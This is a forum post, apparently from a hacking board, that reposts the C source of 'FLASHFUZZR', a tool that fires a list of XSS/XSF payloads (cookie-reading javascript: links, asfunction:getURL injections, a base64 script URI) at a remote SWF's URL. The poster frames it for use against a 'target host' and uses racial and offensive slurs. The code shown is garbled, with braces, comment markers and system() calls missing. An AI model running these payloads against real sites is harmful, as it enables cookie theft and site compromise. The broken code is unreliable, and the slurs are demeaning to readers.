User Controls

Fuzz remote SWF for XSS/XSF.

  1. #1
    Sophie Pedophile Tech Support
    So my nigga' MLT has written a fuzzer to look for XSS/XSF vulnerabilities in remote SWF files. Below is a copypasta of the source code he released. To use it, compile the program using GCC and the following commands.

    gcc -o flashfuzz flashfuzz.c -std=gnu11

    Furthermore you will need to be on linux, have flare installed and have flash enabled in firefox. Other than that, the on screen instructions are easy to follow, just make sure to input your target host's SWF as URL. What's pretty neat is that it comes with an option to decompile the target SWF as well.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <dirent.h>
    #include <malloc.h>
    #pragma GCC diagnostic push
    #pragma GCC diagnostic ignored "-Wunused-result"
    #pragma GCC diagnostic ignored "-Wformat"
    #pragma GCC diagnostic pop

    * ___ _ ___ ___ _ _ ___ _ _ ____ ____ ___ *
    * | __| | | / \ / __| | || | | __| | | | | |_ / |_ / | _ \ *
    * | _| | |__ | - | \__ \ | __ | | _| | |_| | / / / / | / *
    * _|_|_ |____| |_|_| |___/ |_||_| _|_|_ \___/ /___| /___| |_|_\ *
    *_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|*
    * *
    * Version 1.0 - Written by MLT * Usage: *
    * * *
    * Dependencies: Linux * Follow the on-screen instructions *
    * gnome-www-browser* Supply SWF as URL only *
    * Flare * Ensure that you're using a linux *
    * * system with Flare *
    * I am not responsible for this* installed. *
    * tool being used for illegal * *
    * or malicious purposes * I will be writing a Windows port for *
    * * this at some point, but for now this *
    * P.S: I know this is written * is designed for linux. *
    * in a sloppy manner, but it * *
    * gets the job done regardless * you'll need to ensure you input the *
    * * correct full path for directory for *
    * complition tested w/ gcc/g++ * your flare install *
    * (c11/gnu11 std) * *
    * protip: remember to enable flash in firefox (its disabled by default) *
    * gnome-www-browser will launch your default browser, chrome is best choice *
    * *
    * make sure you have your browser already open with a few tabs open before *
    * running the program, FULL README is located at bottom of the source *

    void clear()
    int x;
    for ( x = 0; x < 10; x++ )
    printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"); // too gay for system("cls") or clrscr();

    int main(void)

    DIR *path;
    FILE *fp;
    struct dirent *ptr;
    int primaryInput, helpMenuInput, usageInput, usrInput, fuzzInput, finalInput;
    int j = 0;
    int num = 0;
    char* files[20]; // modify this if necessary
    char in[150], url[150], dir[100], cmd[1000], flare[1000], buff[1000], buffer[1000], line_count[50];
    char the_vectors[129][1000] = {
    "'?mode=tags&tagcloud=<tags><a+href=\"javascript:alert(document.cookie)\"+style=\"font-size:+40pt\">Click me</a></tags>'",
    "'?mode=tags&tagcloud=<tags><a+href=\"javascript:prompt(document.cookie)\"+style=\"font-size:+40pt\">Click me</a></tags>'",
    "'?mode=tags&tagcloud=<tags><a+href=\"javascript:confirm(document.cookie)\"+style=\"font-size:+40pt\">Click me</a></tags>'",
    "'?mode=tags&tagcloud=<tags><a+href=\"javascript:alert`1`\"+style=\"font-size:+40pt\">Click me</a></tags>'",
    "'?mode=tags&tagcloud=<tags><a+href=\"javascript:prompt`1`\"+style=\"font-size:+40pt\">Click me</a></tags>'",
    "'?mode=tags&tagcloud=<tags><a+href=\"javascript:confirm`1`\"+style=\"font-size:+40pt\">Click me</a></tags>'",
    "'?mode=tags&tagcloud=<tags><a+href=\"\"+style=\"font-size:+40pt\">Click me</a></tags>'",
    "'?mode=tags&tagcloud=<tags><a+href=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==\"+style=\"font-size:+40pt\">Click me</a></tags>'",
    "'?getUrlJSParam=\');function eval(a){}prompt(0)//'"
    "'?htmlVar=<a href=\"asfunction:getURL,javascript:prompt(0)\"> Click here</a>'",
    "'?htmlVar=<a href=\"asfunction:getURL,javascript:confirm(0)\"> Click here</a>'",
    "'?htmlVar=<a href=\"asfunction:getURL,javascript:alert`0`\"> Click here</a>'",
    "'?htmlVar=a<img src=\'evil.swf\' />'",
    "'?fontVar=\"><img src=\"evil.swf\"><\"'",

    * will update with moar vectors sometime soon *
    * if anyone has any contributions then feel *
    * free to contact me via email *

    MainMenu: // LOL YEP

    printf("\n\n 1011101110+-------------------------------------------------------------------------------------------------+1010010011\n");
    printf(" 0000011100| [ FLASHFUZZR ] |0111110010\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001111101| Automated GET-Based XSS/XSF Fuzzer for SWF's |0110111010\n");
    printf(" 0100110000| Version 1.0 - Written by MLT (@ret2libc) |1001100001\n");
    printf(" 1010011111| |1010011010\n");
    printf(" 0001110110| Contact me: |0010011111\n");
    printf(" 1011001010| |1001101110\n");
    printf(" 0110101110| |0001101001\n");
    printf(" 1011110100| |0001000100\n");
    printf(" 0101010111| Type '1' to display instructions |0111010000\n");
    printf(" 1100111101| |1010101101\n");
    printf(" 1101111110| .-~*~--,. .-. |0011011000\n");
    printf(" 1110111010| .-~-. ./OOOOOOOOO\\.'OOO`9~~-. |0101101101\n");
    printf(" 0110001010| .`OOOOOO.OOM.OLSONOOOOO@@OOOOOO\\ |0000110111\n");
    printf(" 1101100000| /OOOO@@@OO@@@OO@@@OOO@@@@@@@@OOOO`. |1001001111\n");
    printf(" 0000010010| |OO@@@WWWW@@@@OOWWW@WWWW@@@@@@@OOOO). |0000000001\n");
    printf(" 1111011101| .-'OO@@@@WW@@@W@WWWWWWWWOOWW@@@@@OOOOOO} |1110011110\n");
    printf(" 0011101001| /OOO@@O@@@@W@@@@@OOWWWWWOOWOO@@@OOO@@@OO| |1101101001\n");
    printf(" 1111001000| lOOO@@@OO@@@WWWWWWW\\OWWWO\\WWWOOOOOO@@@O.' |1000100000\n");
    printf(" 1011000001| \\OOO@@@OOO@@@@@@OOW\\ \\WWWW@@@@@@@O'. |0010000000\n");
    printf(" 1000100101| `,OO@@@OOOOOOOOOOWW\\ \\WWWW@@@@@@OOO) |1111100100\n");
    printf(" 1001000000| \\,O@@@@@OOOOOOWWWWW\\ \\WW@@@@@OOOO.' |1010111100\n");
    printf(" 0110101001| `~c~8~@@@@WWW@@W\\ \\WOO|\\UO-~' |1111001010\n");
    printf(" 1100111110| (OWWWWWW@/\\W\\ ___\\WO) |1001000001\n");
    printf(" 1111111000| `~-~'' \\ \\WW=*' |0100001001\n");
    printf(" 0001110111| __\\ \\ |1010000111\n");
    printf(" 1111000011| \\ \\ |0101110101\n");
    printf(" 0110000100| \\ __\\ |1011010010\n");
    printf(" 1111010101| \\ \\ |0011010110\n");
    printf(" 0110000010| \\ \\ |1010100110\n");
    printf(" 0101110100| \\ \\ |0110110110\n");
    printf(" 1100100011| \\ \\ |1100110110\n");
    printf(" 0001110011| \\ \\ |0110001001\n");
    printf(" 0111011100| \\ \\ |0100001111\n");
    printf(" 0000001011| \\_\\ |0011111110\n");
    printf(" 1000110000| |0001101111\n");
    printf(" 0110110100+-------------------------------------------------------------------------------------------------+1011010000\n\n\n");

    scanf("%d", &primaryInput);

    if (primaryInput == 1)



    printf("\n\n 1011101110+-------------------------------------------------------------------------------------------------+1010010011\n");
    printf(" 0000011100| [ FLASHFUZZR ] |0111110010\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001111101| Help Menu |0110111010\n");
    printf(" 1010011111| OPTIONS: |1010011010\n");
    printf(" 0110101110| |0001101001\n");
    printf(" 0110101110| 1 - Usage Guide |0001101001\n");
    printf(" 0110101110| 2 - Fuzz for XSS/XSF |0001101001\n");
    printf(" 0110101110| 3 - Decompile SWF |0001101001\n");
    printf(" 0110101110| 4 - Return to start page |0001101001\n");
    printf(" 0110101110| |0001101001\n");
    printf(" 0110101110| [ Select an option to continue ] |0001101001\n");
    printf(" 0110110100+-------------------------------------------------------------------------------------------------+1011010000\n\n\n");

    else if (primaryInput != 1)

    fprintf(stderr, "\nRead the instructions next time!\n");
    fprintf(stderr, "\nProgram closing!\n");

    * worst error handling in*
    * existence because i'm *
    * fkn lazy :) *

    scanf("%d", &helpMenuInput);

    if (helpMenuInput == 1)

    printf("\n\n 1011101110+-------------------------------------------------------------------------------------------------+1010010011\n");
    printf(" 0000011100| [ FLASHFUZZR ] |0111110010\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001111101| Usage Guide |0110111010\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001110010| To fuzz an SWF for XSS/XSF simply navigate to the help menu then select |1010100111\n");
    printf(" 0001111101| the 'fuzz for XSS/XSF' option' and input the remote URL to the SWF file |0110111010\n");
    printf(" 0001110010| when instructed - firefox will then begin to open browser windows and |1010100111\n");
    printf(" 0001110010| begin fuzzing for vulns. |1010100111\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001110010| To decompile an SWF, navigate to the help menu and select the 'decompile |1010100111\n");
    printf(" 0001110010| SWF' option and follow the instructions on screen |1010100111\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001110010| Dependencies: |1010100111\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001110010| - Mozilla Firefox |1010100111\n");
    printf(" 0001110010| - Linux |1010100111\n");
    printf(" 0001110010| - Flare |1010100111\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001110010| Type '1' to return to help menu |1010100111\n");
    printf(" 0110110100+-------------------------------------------------------------------------------------------------+1011010000\n\n\n");

    scanf("%d", &usageInput);

    if (usageInput == 1)
    goto HelpMenu; // sue me :)


    else if (helpMenuInput == 2)


    printf("\n\n 1011101110+-------------------------------------------------------------------------------------------------+1010010011\n");
    printf(" 0000011100| [ FLASHFUZZR ] |0111110010\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001111101| Begin Fuzzing |0110111010\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001110010| In order to begin fuzzing for vulnerabilities, please enter the direct |1010100111\n");
    printf(" 0001111101| link to the remote URL below and hit the 'enter' key to confirm. Ensure |0110111010\n");
    printf(" 0001110010| that firefox is installed and that the URL to the SWF you're testing is |1010100111\n");
    printf(" 0001110010| correctly typed. |1010100111\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001110010| ENTER PATH TO SWF URL: |1010100111\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001110010| Type '1' to return to help menu |1010100111\n");
    printf(" 0110110100+-------------------------------------------------------------------------------------------------+1011010000\n\n\n");

    scanf("%d", &usrInput);

    if (usrInput == 1)
    goto HelpMenu; // sue me :)

    scanf("%s", url);
    printf("\n\n\n\n\n [+] Fuzzing initiated on: %s [+]\n\n\n\n\n", url);

    size_t i = 0;

    for (i = 0; i < sizeof(the_vectors) / sizeof(the_vectors[0]); i++)
    snprintf(buffer, sizeof buffer, "%s%s", url, the_vectors[i]);
    snprintf(cmd, sizeof cmd, "%s%s", "gnome-www-browser --disable-web-security ", buffer);
    system("sleep .10");

    printf("\n\n\n\n\n [+] Fuzzing on: %s complete [+]\n\n\n\n\n", url);
    printf(" check each browser tab to see if any vulns are present\n\n\n");
    printf("\n Enter '1' to exit the program, or alternatively enter '2' to return to the main menu\n\n\n");

    scanf("%d", &fuzzInput);

    if (fuzzInput == 1)
    printf("\nProgram closing!\n\n\n");

    if (fuzzInput == 2)
    goto MainMenu; // sue me :)

    else if (fuzzInput != 1 || fuzzInput != 2)

    fprintf(stderr, "\nRead the instructions next time!\n");
    fprintf(stderr, "\nProgram closing!\n\n\n");

    * worst error handling in*
    * existence because i'm *
    * fkn lazy :) *


    else if (helpMenuInput == 3)

    printf("\n\n 1011101110+-------------------------------------------------------------------------------------------------+1010010011\n");
    printf(" 0000011100| [ FLASHFUZZR ] |0111110010\n");
    printf(" 0001110010| |1010100111\n");
    printf(" 0001111101| SWF Decompiler |0110111010\n");
    printf(" 1010011111| |1010011010\n");
    printf(" 0110101110| Remember to modify opendir(); to the path for your 'flare' directory |0001101001\n");
    printf(" 0110101110| Enter any key to begin decompilation |0001101001\n");
    printf(" 0110110100+-------------------------------------------------------------------------------------------------+1011010000\n\n\n");

    * make sure to follow the installation *
    * instructions for flare and when running *
    * this program specify the full path to *
    * the directory where you unpacked the *
    * tarball for flare. *
    * *
    * you should also ensure that you have *
    * the SWF files that you wish to decompile*
    * stored within this same directory *
    * *
    * I didn't bother implementing proper err *
    * handling for this, so if you fuck up you*
    * won't be warned. Follow the instructions*
    * and it should work fine :) *

    printf("\nEnter the path to the directory of your flare install:\n\n\n");
    scanf("%s", dir);

    if ((path = opendir (dir)) != NULL)

    while ((ptr = readdir (path)) != NULL)
    if (ptr->d_name[0] != '.')
    printf ("%s\n", ptr->d_name);
    fp = fopen("listing.txt", "aw+");
    strcpy(in, ptr->d_name);
    strcat(in, "\n");
    fputs(in, fp);
    fprintf(stderr, "\nInvalid directory\n");

    fp = fopen("listing.txt", "r");

    while(fgets(line_count, sizeof line_count, fp)!=NULL)

    for (int x=0 ; x < num+1; x++)
    if (files[x] != '\0')
    printf("Performing decompilation on: \n%s", files[x]);
    size_t y = 0;

    for (y = 0; y < sizeof(files) / sizeof(files[0]); y++)
    snprintf(buff, sizeof buff, "%s", files[y]);
    snprintf(flare, sizeof flare, "%s%s", "./flare ", buff);

    system("rm listing.txt");
    printf("\nDecompilation complete!\n\n\n");
    printf("\nEnter '1' to exit the program, or alternatively enter '2' to return to the main menu\n\n\n");
    scanf("%d", &finalInput);

    if (finalInput == 1)
    printf("\nProgram closing!\n\n\n");

    if (finalInput == 2)
    goto MainMenu; // sue me :)


    if (helpMenuInput == 4)
    goto MainMenu; // sue me :)

    else if (helpMenuInput != 1 || helpMenuInput != 2 || helpMenuInput != 3 || helpMenuInput != 4)

    fprintf(stderr, "\nRead the instructions next time!\n");
    fprintf(stderr, "\nProgram closing!\n\n\n");

    * worst error handling in*
    * existence because i'm *
    * fkn lazy :) *

    return 0;


    * README: Full list of dependancies and errors you may encounter *
    * *
    * The purpose of this program is to allow you to easily perform blackbox + whitebox testing on *
    * SWF files for vulns such as cross site scripting and cross site flashing. *
    * In addition to this, I've also added some functionality for decompilation of SWF's. *
    * *
    * I noticed flare (probably the most basic command-line flash decompiler) is very limited in *
    * what you can do with it, so I've added a feature here to allow you to specify a directory and *
    * have flare automatically decompile every SWF file within that directory so you can then view *
    * the .flr files and begin to analyze the code for bugs. *
    * *
    * There are a few dependancies, for now this is working only for linux, you'll need to ensure *
    * that you have gnome-www-browser installed as i'm using this as an alternative to xdg-open due *
    * to extra functionality when launching a URL. *
    * *
    * In order to have the SWF decompilation feature working properly, you'll have to ensure you *
    * specify the correct directory where your flare install is located when prompted *
    * *
    * you'll also want to modify the size of files[] as appropriate (assuming you're decompiling *
    * more than 20 files at once) *
    * *
    * In order to install flare, download the tarball from here: *
    * *
    * *
    * I'm making this launch browser processes rather than opening a socket because this greatly *
    * reduces (100% reduction) false positives and allows you to see the results in real time *
    * *
    * I suggest using google chrome for this, firefox will probably be buggy. Before you run this *
    * program, make sure you already have google chrome open with more than one tab opened. *
    * *
    * If you experience any issues with chrome not opening each instance in a new tab instantly, then*
    * run the following command then try again: *
    * *
    * pkill -9 chrome *
    * *
    * if there's still an issue, try running this: *
    * *
    * for i in `pgrep chrome` ; do kill $i ; sleep .10 ; done" *
    * *
    * I didnt bother implementing proper error handling for the CLI-based menu (as you can prob tell)*
    * Just make sure to follow the on-screen instructions and you shouldn't have any problems. *
    * *
    * also i'm aware this is probably vulnerable to BoF and is also passing user inputs to system(); *
    * but I see no real risk here. If you wanna perform RCE or BoF ON YOUR OWN SYSTEM LOCALLY then *
    * be my guest. *
    * *
    * ensure that you have write privs for the area you're running this in. *
    * *
    * to compile and execute: *
    * gcc -o flashfuzz flashfuzz.c -std=gnu11 *
    * ./flashfuzz *
    * *

Jump to Top